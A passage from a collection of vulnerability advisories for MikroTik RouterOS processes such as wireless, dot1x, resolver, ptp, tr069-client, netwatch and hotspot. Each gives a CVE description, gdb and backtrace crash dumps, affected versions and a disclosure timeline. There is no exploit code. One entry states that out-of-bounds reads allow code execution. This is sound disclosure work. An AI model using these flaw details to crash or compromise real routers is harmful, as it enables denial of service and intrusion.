| * 1 process 384 target:/ram/pckg/advanced-tools/nova/bin/netwatch 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-16:25:57.65@0: 46 | 2020.06.04-16:25:57.65@0: 47 | 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch 48 | 2020.06.04-16:25:57.65@0: --- signal=8 -------------------------------------------- 49 | 2020.06.04-16:25:57.65@0: 50 | 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246 51 | 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x00000000 ebp=0x7ffff3f8 esp=0x7ffff3b0 52 | 2020.06.04-16:25:57.65@0: eax=0x00000000 ebx=0x08051020 ecx=0x00000000 edx=0x00000000 53 | 2020.06.04-16:25:57.65@0: 54 | 2020.06.04-16:25:57.65@0: maps: 55 | 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00000000 00:1a 14 /ram/pckg/advanced-tools/nova/bin/netwatch 56 | 2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp 00000000 00:0c 946 /lib/libumsg.so 60 | 2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 61 | 2020.06.04-16:25:57.65@0: 62 | 2020.06.04-16:25:57.65@0: stack: 0x80000000 - 0x7ffff3b0 63 | 2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff 7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00 64 | 2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc 77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77 65 | 2020.06.04-16:25:57.65@0: 66 | 2020.06.04-16:25:57.65@0: code: 0x804c6d7 67 | 2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec 0c 68 | ``` 69 | 70 | #### Affected Version 71 | 72 | This vulnerability was initially found in stable `6.46.2`, and was fixed in stable `6.47`. 73 | 74 | #### Timeline 75 | 76 | + 2020/04/20 - report the vulnerability to the vendor 77 | + 2020/06/02 - vendor fix it in stable `6.47` 78 | + 2021/05/04 - CVE is assigned 79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20265/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20265 2 | 3 | #### Description 4 | 5 | The `wireless` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `wireless` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x8070dbe: inc DWORD PTR ds:0x0 15 | 0x8070dc4: add esp,0x10 16 | 0x8070dc7: push ebx 17 | 0x8070dc8: mov eax,DWORD PTR [esi+0x8] 18 | 0x08070dbe in ?? () 19 | (gdb) i r 20 | eax 0x81164c4 135357636 21 | ecx 0x811814c 135364940 22 | edx 0x1 1 23 | ebx 0x776fcaf0 2003815152 24 | esp 0x7fc6dfd0 0x7fc6dfd0 25 | ebp 0x7fc6e008 0x7fc6e008 26 | esi 0x8130a58 135465560 27 | edi 0x7fc6e084 2143740036 28 | eip 0x8070dbe 0x8070dbe 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 120 target:/ram/pckg/wireless/nova/bin/wireless 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-18:12:52.69@0: 46 | 2020.06.04-18:12:52.69@0: /ram/pckg/wireless/nova/bin/wireless 47 | 2020.06.04-18:12:52.69@0: --- signal=11 -------------------------------------------- 48 | 2020.06.04-18:12:52.69@0: 49 | 2020.06.04-18:12:52.69@0: eip=0x08070dbe eflags=0x00010202 50 | 2020.06.04-18:12:52.69@0: edi=0x7fc6e084 esi=0x08130a58 ebp=0x7fc6e008 esp=0x7fc6dfd0 51 | 2020.06.04-18:12:52.69@0: eax=0x081164c4 ebx=0x776fcaf0 ecx=0x0811814c edx=0x00000001 52 | 2020.06.04-18:12:52.69@0: 53 | 2020.06.04-18:12:52.69@0: maps: 54 | 2020.06.04-18:12:52.69@0: 08048000-08115000 r-xp 00000000 00:19 99 /ram/pckg/wireless/nova/bin/wireless 55 | 2020.06.04-18:12:52.69@0: 7749f000-774a1000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so 56 | 2020.06.04-18:12:52.69@0: 774a3000-774d8000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-18:12:52.69@0: 774dc000-774f6000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-18:12:52.69@0: 774f7000-77506000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-18:12:52.69@0: 77507000-77664000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0 60 | 2020.06.04-18:12:52.69@0: 77674000-776bf000 r-xp 00000000 00:0c 956 /lib/libssl.so.1.0.0 61 | 2020.06.04-18:12:52.69@0: 776c3000-776cd000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so 62 | 2020.06.04-18:12:52.69@0: 776cf000-776ec000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 63 | 2020.06.04-18:12:52.69@0: 776ed000-776f3000 r-xp 00000000 00:0c 951 /lib/liburadius.so 64 | 2020.06.04-18:12:52.69@0: 776f4000-776fc000 r-xp 00000000 00:0c 950 /lib/libubox.so 65 | 2020.06.04-18:12:52.69@0: 776fd000-77749000 r-xp 00000000 00:0c 946 /lib/libumsg.so 66 | 2020.06.04-18:12:52.69@0: 7774f000-77756000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 67 | 2020.06.04-18:12:52.69@0: 68 | 2020.06.04-18:12:52.69@0: stack: 0x7fc6f000 - 0x7fc6dfd0 69 | 2020.06.04-18:12:52.69@0: c4 64 11 08 07 c8 0f 08 f0 f0 10 08 f0 f0 10 08 28 fe 12 08 84 e0 c6 7f 08 e0 c6 7f 63 3d 06 08 70 | 2020.06.04-18:12:52.69@0: 0c 00 00 00 00 00 00 00 18 e0 c6 7f f0 ca 6f 77 58 0a 13 08 84 e0 c6 7f 38 e0 c6 7f 7c 7a 6f 77 71 | 2020.06.04-18:12:52.69@0: 72 | 2020.06.04-18:12:52.69@0: code: 0x8070dbe 73 | 2020.06.04-18:12:52.69@0: ff 05 00 00 00 00 83 c4 10 53 8b 46 08 0f b6 40 74 | ``` 75 | 76 | #### Affected Version 77 | 78 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 79 | 80 | #### Timline 81 | 82 | + 2020/04/08 - report the vulnerability to the vendor 83 | + 2020/06/02 - vendor fix it in stable `6.47` 84 | + 2021/05/04 - CVE is assigned 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20266/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20266 2 | 3 | #### Description 4 | 5 | The `dot1x` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `dot1x` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x776a51e5 <_ZN6string6assignERKS_+23>: mov edx,DWORD PTR [eax] 15 | 0x776a51e7 <_ZN6string6assignERKS_+25>: add edx,eax 16 | 0x776a51e9 <_ZN6string6assignERKS_+27>: add edx,0x4 17 | 0x776a51ec <_ZN6string6assignERKS_+30>: push edx 18 | 0x776a51e5 in string::assign(string const&) () from target:/lib/libuc++.so 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x0 0 22 | edx 0x8062e28 134622760 23 | ebx 0x776ad4ec 2003490028 24 | esp 0x7fc50f6c 0x7fc50f6c 25 | ebp 0x7fc50f78 0x7fc50f78 26 | esi 0x8062ed0 134622928 27 | edi 0x7fc51064 2143621220 28 | eip 0x776a51e5 0x776a51e5 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 197 target:/nova/bin/dot1x 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-14:51:29.47@0: 46 | 2020.06.04-14:51:29.47@0: 47 | 2020.06.04-14:51:29.81@0: /nova/bin/dot1x 48 | 2020.06.04-14:51:29.81@0: --- signal=11 -------------------------------------------- 49 | 2020.06.04-14:51:29.81@0: 50 | 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202 51 | 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78 esp=0x7fc50f6c 52 | 2020.06.04-14:51:29.81@0: eax=0x00000000 ebx=0x776ad4ec ecx=0x00000000 edx=0x08062e28 53 | 2020.06.04-14:51:29.81@0: 54 | 2020.06.04-14:51:29.81@0: maps: 55 | 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00000000 00:0c 1064 /nova/bin/dot1x 56 | 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00000000 00:0c 951 /lib/liburadius.so 60 | 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 00000000 00:0c 950 /lib/libubox.so 61 | 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 62 | 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00000000 00:0c 946 /lib/libumsg.so 63 | 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 64 | 2020.06.04-14:51:29.81@0: 65 | 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c 66 | 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08 67 | 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f 68 | 2020.06.04-14:51:29.81@0: 69 | 2020.06.04-14:51:29.81@0: code: 0x776a51e5 70 | 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8 71 | ``` 72 | 73 | #### Affected Version 74 | 75 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 76 | 77 | #### Timeline 78 | 79 | + 2020/04/20 - report the vulnerability to the vendor 80 | + 2020/06/02 - vendor fix it in stable `6.47` 81 | + 2021/05/04 - CVE is assigned 82 | 83 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20267/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20267 2 | 3 | #### Description 4 | 5 | The `resolver` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `resolver` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x80508f6: mov BYTE PTR [eax],dl 15 | 0x80508f8: mov eax,DWORD PTR [ebx+0x14] 16 | 0x80508fb: inc eax 17 | 0x80508fc: mov DWORD PTR [ebx+0x14],eax 18 | 0x080508f6 in ?? () 19 | (gdb) i r 20 | eax 0xc 12 21 | ecx 0x77676f00 2003267328 22 | edx 0x5 5 23 | ebx 0x8061c98 134618264 24 | esp 0x7fe5fcc0 0x7fe5fcc0 25 | ebp 0x7fe5fd08 0x7fe5fd08 26 | esi 0x8062018 134619160 27 | edi 0x8060620 134612512 28 | eip 0x80508f6 0x80508f6 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 197 target:/nova/bin/resolver 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.18-14:38:03.27@0: 46 | 2020.06.18-14:38:03.27@0: 47 | 2020.06.18-14:38:03.28@0: /nova/bin/resolver 48 | 2020.06.18-14:38:03.28@0: --- signal=11 -------------------------------------------- 49 | 2020.06.18-14:38:03.28@0: 50 | 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 51 | 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0 52 | 2020.06.18-14:38:03.28@0: eax=0x0000000c ebx=0x08061c98 ecx=0x77676f00 edx=0x00000005 53 | 2020.06.18-14:38:03.28@0: 54 | 2020.06.18-14:38:03.28@0: maps: 55 | 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00000000 00:0c 995 /nova/bin/resolver 56 | 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.18-14:38:03.28@0: 63 | 2020.06.18-14:38:03.28@0: stack: 0x7fe60000 - 0x7fe5fcc0 64 | 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 65 | 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 66 | 2020.06.18-14:38:03.28@0: 67 | 2020.06.18-14:38:03.28@0: code: 0x80508f6 68 | 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 74 | 75 | #### Timeline 76 | 77 | + 2020/01/06 - reported the vulnerability to the vendor 78 | + 2020/01/07 - the vendor confirmed the vulnerability 79 | + 2020/06/02 - the vendor fixed it in stable `6.47` 80 | + 2021/05/04 - CVE was assigned 81 | 82 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2021-36613/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2021-36613 2 | 3 | #### Description 4 | 5 | The `ptp` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `ptp` process due to NULL pointer dereference. 6 | 7 | Against stable `6.48.1`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2021.02.08-12:13:09.33@0: 12 | 2021.02.08-12:13:09.33@0: /nova/bin/ptp 13 | 2021.02.08-12:13:09.33@0: --- signal=11 -------------------------------------------- 14 | 2021.02.08-12:13:09.33@0: 15 | 2021.02.08-12:13:09.33@0: eip=0x08050abb eflags=0x00010202 16 | 2021.02.08-12:13:09.33@0: edi=0x7fd5ee94 esi=0x0805be48 ebp=0x7fd5ee18 esp=0x7fd5ee18 17 | 2021.02.08-12:13:09.33@0: eax=0x00000000 ebx=0x776f5b40 ecx=0x0805c6a8 edx=0x00000001 18 | 2021.02.08-12:13:09.33@0: 19 | 2021.02.08-12:13:09.33@0: maps: 20 | 2021.02.08-12:13:09.33@0: 08048000-08058000 r-xp 00000000 00:0c 1067 /nova/bin/ptp 21 | 2021.02.08-12:13:09.33@0: 7767d000-776b2000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 22 | 2021.02.08-12:13:09.33@0: 776b6000-776d0000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 23 | 2021.02.08-12:13:09.33@0: 776d1000-776e0000 r-xp 00000000 00:0c 945 /lib/libuc++.so 24 | 2021.02.08-12:13:09.33@0: 776e1000-776eb000 r-xp 00000000 00:0c 963 /lib/libm-0.9.33.2.so 25 | 2021.02.08-12:13:09.33@0: 776ed000-776f5000 r-xp 00000000 00:0c 951 /lib/libubox.so 26 | 2021.02.08-12:13:09.33@0: 776f6000-77742000 r-xp 00000000 00:0c 947 /lib/libumsg.so 27 | 2021.02.08-12:13:09.33@0: 77748000-7774f000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 28 | 2021.02.08-12:13:09.33@0: 29 | 2021.02.08-12:13:09.33@0: stack: 0x7fd5f000 - 0x7fd5ee18 30 | 2021.02.08-12:13:09.33@0: 48 ee d5 7f 7c 0a 6f 77 48 be 05 08 94 ee d5 7f 05 00 00 00 86 3c 71 77 f8 ef d5 7f 0c 00 fe 08 31 | 2021.02.08-12:13:09.33@0: 58 ee d5 7f 40 5b 6f 77 a0 f1 d5 7f 94 ee d5 7f b8 ee d5 7f 16 41 6f 77 94 ee d5 7f a0 f1 d5 7f 32 | 2021.02.08-12:13:09.33@0: 33 | 2021.02.08-12:13:09.33@0: code: 0x8050abb 34 | 2021.02.08-12:13:09.33@0: 8b 10 89 45 08 8b 42 18 5d ff e0 55 89 e5 31 c0 35 | ``` 36 | 37 | #### Affected Version 38 | 39 | This vulnerability was initially found in stable `6.48.1`, and was fixed in stable `6.48.2`. 40 | 41 | #### Timeline 42 | 43 | + 2021/03/01 - reported the vulnerability to the vendor 44 | + 2021/03/18 - the vendor reproduced and confirmed the vulnerability 45 | + 2021/06/01 - the vendor responded that it was fixed in stable `6.48.2` 46 | + 2022/05/12 - CVE was assigned 47 | 48 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2021-36614/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2021-36614 2 | 3 | #### Description 4 | 5 | The `tr069-client` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `tr069-client` process due to NULL pointer dereference. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x805a185: push DWORD PTR [eax] 15 | 0x805a187: push 0x1 16 | 0x805a189: push esi 17 | 0x805a18a: call 0x804eb10 <_ZN2nv7message6insertINS_6u32_idEEEvT_NS_8IdTraitsIS3_E8set_typeE@plt> 18 | 0x0805a185 in ?? () 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x776924ec 2003379436 22 | edx 0x7769187c 2003376252 23 | ebx 0x80a9290 134910608 24 | esp 0x7ff7497c 0x7ff7497c 25 | ebp 0x7ff74988 0x7ff74988 26 | esi 0x7ff74a04 2146912772 27 | edi 0x7ff74a04 2146912772 28 | eip 0x805a185 0x805a185 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 198 target:/ram/pckg/tr069-client/nova/bin/tr069-client 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.10-17:04:17.63@0: 46 | 2020.06.10-17:04:17.63@0: 47 | 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client 48 | 2020.06.10-17:04:17.63@0: --- signal=11 -------------------------------------------- 49 | 2020.06.10-17:04:17.63@0: 50 | 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206 51 | 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988 esp=0x7ff7497c 52 | 2020.06.10-17:04:17.63@0: eax=0x00000000 ebx=0x080a9290 ecx=0x776924ec edx=0x7769187c 53 | 2020.06.10-17:04:17.63@0: 54 | 2020.06.10-17:04:17.63@0: maps: 55 | 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00000000 00:10 13 /ram/pckg/tr069-client/nova/bin/tr069-client 56 | 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 58 | 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00000000 00:0c 945 /lib/libuc++.so 59 | 2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp 00000000 00:0c 963 /lib/libm-0.9.33.2.so 60 | 2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp 00000000 00:0c 948 /lib/libucrypto.so 61 | 2020.06.10-17:04:17.63@0: 776bd000-776c0000 r-xp 00000000 00:0c 954 /lib/libxml.so 62 | 2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp 00000000 00:0c 947 /lib/libumsg.so 63 | 2020.06.10-17:04:17.63@0: 77710000-7771b000 r-xp 00000000 00:0c 955 /lib/libuhttp.so 64 | 2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp 00000000 00:0c 951 /lib/libubox.so 65 | 2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 66 | 2020.06.10-17:04:17.63@0: 67 | 2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c 68 | 2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7 7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00 69 | 2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09 08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f 70 | 2020.06.10-17:04:17.63@0: 71 | 2020.06.10-17:04:17.63@0: code: 0x805a185 72 | 2020.06.10-17:04:17.63@0: ff 30 6a 01 56 e8 81 49 ff ff 83 c4 0c ff 73 24 73 | 2020.06.10-17:04:17.63@0 74 | ``` 75 | 76 | #### Affected Version 77 | 78 | This vulnerability was initially found in stable `6.47`, and was fixed in stable `6.48.2`. 79 | 80 | #### Timeline 81 | 82 | + 2021/03/01 - reported the vulnerability to the vendor 83 | + 2021/03/18 - the vendor reproduced and confirmed the vulnerability 84 | + 2021/06/01 - the vendor responded that it was fixed in stable `6.48.2` 85 | + 2022/05/12 - CVE was assigned 86 | 87 | 88 | 89 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-36522/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-36522 2 | 3 | #### Description 4 | 5 | The `netwatch` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `netwatch` process, by sending a crafted packet, an authenticated remote user can crash the `netwatch` process due to assertion failure. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.29-14:27:25.52@0: 12 | 2020.06.29-14:27:25.52@0: 13 | 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch 14 | 2020.06.29-14:27:25.52@0: --- signal=6 -------------------------------------------- 15 | 2020.06.29-14:27:25.52@0: 16 | 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x00000246 17 | 2020.06.29-14:27:25.52@0: edi=0xffffffff esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698 18 | 2020.06.29-14:27:25.52@0: eax=0x00000000 ebx=0x000000b8 ecx=0x000000b8 edx=0x00000006 19 | 2020.06.29-14:27:25.52@0: 20 | 2020.06.29-14:27:25.52@0: maps: 21 | 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00000000 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch 22 | 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 24 | 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00000000 00:0c 945 /lib/libuc++.so 25 | 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00000000 00:0c 947 /lib/libumsg.so 26 | 2020.06.29-14:27:25.52@0: 77740000-77747000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 27 | 2020.06.29-14:27:25.52@0: 28 | 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698 29 | 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00 30 | 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff 31 | 2020.06.29-14:27:25.52@0: 32 | 2020.06.29-14:27:25.52@0: code: 0x776b855b 33 | 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 34 | ``` 35 | 36 | #### Affected Version 37 | 38 | This vulnerability was initially found in stable `6.46.2`, the stable version `6.48.3` also suffered from this vulnerability. When tested against the latest stable version `6.49.6`, it turned out that this vulnerability was fixed. 39 | 40 | #### Timeline 41 | 42 | + 2021/03/01 - reported the vulnerability to the vendor 43 | + 2021/03/18 - vendor reproduced and confirmed the vulnerability 44 | + 2022/08/27 - CVE was assigned 45 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-45313/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-45313 2 | 3 | #### Description 4 | 5 | The `hotspot` process suffers from an out-of-bounds read vulnerability. Due to lack of proper validation, by sending a crafted nova message with a specific u32_id key with negative value, it's possible to cause out-of-bounds read, which may affect the function pointer of an indirect call furtherly. It's possible for an authenticated user to achieve code execution. 6 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 7 | 8 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 9 | 10 | ```shell 11 | (gdb) c 12 | Continuing. 13 | 14 | Program received signal SIGSEGV, Segmentation fault. 15 | => 0x65737520: Error while running hook_stop: 16 | Cannot access memory at address 0x65737520 17 | 0x65737520 in ?? () 18 | (gdb) i r 19 | eax 0x7fad0fb4 2142048180 20 | ecx 0x0 0 21 | edx 0x65737520 1702065440 22 | ebx 0x6d7ae08a 1836769418 23 | esp 0x7fad0f5c 0x7fad0f5c 24 | ebp 0x7fad0fd8 0x7fad0fd8 25 | esi 0xffffffec -20 26 | edi 0xffffffff -1 27 | eip 0x65737520 0x65737520 28 | eflags 0x10202 [ IF RF ] 29 | cs 0x73 115 30 | ss 0x7b 123 31 | ds 0x7b 123 32 | es 0x7b 123 33 | fs 0x0 0 34 | gs 0x33 51 35 | (gdb) info inferiors 36 | Num Description Executable 37 | * 1 process 201 target:/ram/pckg/hotspot/nova/bin/hotspot 38 | ``` 39 | 40 | And the crash dump in `/rw/logs/backtrace.log` was: 41 | 42 | ```shell 43 | # cat /rw/logs/backtrace.log 44 | 2020.06.22-15:04:20.55@0: 45 | 2020.06.22-15:04:20.55@0: 46 | 2020.06.22-15:04:20.55@0: /ram/pckg/hotspot/nova/bin/hotspot 47 | 2020.06.22-15:04:20.55@0: --- signal=11 -------------------------------------------- 48 | 